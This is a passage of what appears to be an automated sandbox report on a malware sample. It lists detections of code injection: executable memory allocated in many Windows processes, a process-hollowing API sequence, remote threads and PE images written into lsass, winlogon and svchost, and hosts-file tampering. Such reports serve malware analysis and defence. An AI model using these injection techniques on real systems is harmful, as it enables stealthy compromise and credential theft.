          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13F83A20000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22360790000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24FBB770000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1E7778B0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1D2DB850000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26161A70000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 208B1FB0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E0571F0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B9F4B60000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10DF0000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D661170000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 23A75740000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D730000 protect: page execute and read and write
          Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D760000 protect: page execute and read and write
          Contains functionality to inject code into remote processes
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,25_2_0000000140001C88
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC61273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D273CJump to behavior
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC67273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0B1273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6133273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AED8273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8799273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5377273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D53273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D273C
          Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B37273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5904273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7316273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E86273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCE273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6694273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 29D0273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 344273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC69273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7897273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 641A273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60DB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83A2273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6079273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BB77273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 778B273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DB85273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 61A7273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B1FB273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 571F273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F4B6273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10DF273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6117273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7574273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D73273C
          Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7D76273C
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAE2A0000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3440000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13F83A20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22360790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24FBB770000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1E7778B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D2DB850000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26161A70000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 208B1FB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E0571F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9F4B60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10DF0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D661170000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 23A75740000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A07D760000 value starts with: 4D5A
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 3440000 value: 4D
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\file.exeThread register set: target process: 6716Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 2500Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 5904Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 7180Jump to behavior
          Modifies the hosts file
          Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAE2A0000Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 14000B000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3E0000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10CE0000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE10B30000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1BE109D0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3440000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
